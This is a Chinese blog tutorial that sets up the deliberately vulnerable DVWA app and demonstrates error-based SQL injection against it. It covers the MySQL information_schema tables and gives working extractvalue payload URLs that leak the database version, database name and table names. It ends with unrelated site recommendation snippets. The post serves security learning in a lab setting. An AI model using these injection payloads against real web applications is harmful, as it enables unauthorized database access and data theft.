Web安全之SQL注入漏洞学习(六)-报错注入实战

最新推荐文章于 2024-04-21 14:08:32 发布
最新推荐文章于 2024-04-21 14:08:32 发布
阅读量300 收藏
点赞数
分类专栏: Web安全 文章标签: 数据库 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u012002125/article/details/120630648
版权
本文介绍了DVWA(Damn Vulnerable Web App)靶机的搭建过程,并详细讲解了SQL注入漏洞的检测与利用。通过注入'号获取数据库报错信息,展示了如何利用extractvalue和information_schema获取数据库版本、数据库名、表名等敏感信息。同时,提供了利用注入获取数据的payload示例,揭示了攻击者可能获取到的数据全貌。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DVWA靶机搭建

​ DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。

​ 搭建方法与第一遍文章搭建bWAPP环境相同!!默认用户名:admin 默认密码:password

基础知识

​ 在MySQL中,自带了 information_schema信息数据库。这个库的作用保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。

information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表。

选择漏洞

漏洞检测

使用最经典的'号进行检测,如果返回错误信息则说明存在注入漏洞

如下图所示,输入'号后点击提交后页面返回数据库的报错信息。

 构建playload验证是否能成功注入。

http://x.xx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,(select @@version)) -- &Submit=Submit#

注入后成功获取了数据库版本号。

漏洞利用

获取数据库名称过程

http://xx.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select database()))) -- &Submit=Submit#

获取数据库表表名过程

information_schema:

首选尝试查询当前数据库中有哪些表,看看是否能够返回数据中所有表名

http://x.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables ))) -- &Submit=Submit#

http://x.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables limit 1,1))) -- &Submit=Submit#

 从上述过程注入过程中我们可以通过information_schema数据库获取到数据库中所有的表信息,进而获取表中的所有数据,此时攻击者就相当于掌握的数据中所有的信息。

欢迎大家关注我的订阅号,会定期分享一些关于测试相关的文章,有问题也欢迎一起讨论学习!
在这里插入图片描述

 

《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 1万+
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
《网络安全自学教程》- SQL注入漏洞详解
热门推荐
wangyuxiang946的博客
05-06 1万+
SQL注入常出现在哪些功能?SQL注入危害,SQL注入分类,判断是否存在SQL注入SQL注入方式
mysql生成数据字典
古达的博客
03-24 526
Mysql生成数据字典
MYSQL
12-20 235
数据库表说明: 用户权限表 select * from mysql.user 获取表名和释映射 [x] TABLES:存储数据库中的表信息 表属于哪个数据库,表的类型、存储引擎、创建时间等信息 select * from information_schema.tables...
Mysql生成数据字典
WwLK123的博客
03-23 4454
实现原理 在MySQL中,有个自带的数据库,名为information_schema。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。我们通过查询这个数据库的COLUMNS表(此表提供了其他所有表中的列信息)信息,来获取我们需要的表结构信息,从而将其导出为数据字典。 实现案例 navicat 执行以下SQL的查询(如果需要其他字段,请参考下面COLUMNS表字段拓展): SELECT COLUMN_NAME AS '字段名'
生成mysql数据字典
我的乌托
12-31 333
data_dictionary.php <?php /** * 生成mysql数据字典 */ header("Content-type: text/html; charset=utf-8"); //配置数据库 $dbserver = "127.0.0.1"; $dbusername = "root"; $dbpassword = "aigukj163"; $databas...
网络安全-sql注入实战-sql-labs(1~10)
最新发布
09-02
在深入探讨《网络安全-sql注入实战-sql-labs(1~10)》这一主题之前,我们首先要理解网络安全领域内SQL注入的严重性和它的工作机制。SQL注入是一种攻击技术,攻击者通过向Web应用的输入点插入恶意SQL代码,以此影响...
墨者学院-SQL注入漏洞测试(报错
weixin_42939822的博客
03-30 5291
墨者学院-SQL注入漏洞测试(报错
网络安全SQL注入漏洞复现(中篇)(技术进阶)
weixin_70911257的博客
04-21 1698
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
MySQL自动生成数据字典SQL语句
08-01
自己写的两个SQL语句生成对应数据库的数据字典,一个生成表集合,一个生成字段集合 只需修改where语句后面的TABLE_SCHEMA的数据库名即可
Mysql 数据字典生成工具 V2
08-29
V2 版本更新: 可以导出原来数据库中的 comment 字段了! 原程序为外国人缩写,但是原作者的blog已经无法打开。 从 http://download.youkuaiyun.com/detail/esr2587758/2121033 这里下载后,发现代码有兼容问题和中文乱码问题。 于是修复了兼容问题和编码问题,亲自测试,已经可以正常使用。使用环境: windows 7 php 5.4 mysql 5.1 可以在线查看和正常导出excel表。
mysql数据字典生成工具
02-03
mysql数据字典生成工具
mysql数据字典生成工具,一键生成,简单易用
09-23
mysql数据字典生成工具,一键生成,简单易用
MySQL创建数据字典
03-24
通过配置数据库,可以实现把数据库里面所有字段拿出来展示在HTML网页上
mysql数据字典生成
LANXIAMAO的博客
07-31 465
【代码】mysql数据字典生成。
mysql 数据字典文档_数据库——生成数据字典
weixin_32017139的博客
01-27 1174
很多时候,在一个项目的开始或者结束时,整理项目开发文档、用户手册、交付文档时都会在文档中包含数据库的说明,主要体现形式就是数据字典,下面我就为大家介绍直接使用基本的sql语句来定制自己的数据字典的方法:>SqlServer:基本使用:表名=case when a.colorder=1 then d.name else '' end,表说明=case when a.colorder=1 the...
mysql 生成数据字典sql语句
weixin_33827590的博客
07-10 506
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, COLUMN_TYPE, COLUMN_COMMENT FROM information_schema. COLUMNS WHERE TABLE_SCHEMA = '数据库名称' 转载于:https://www.cnblogs.com...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值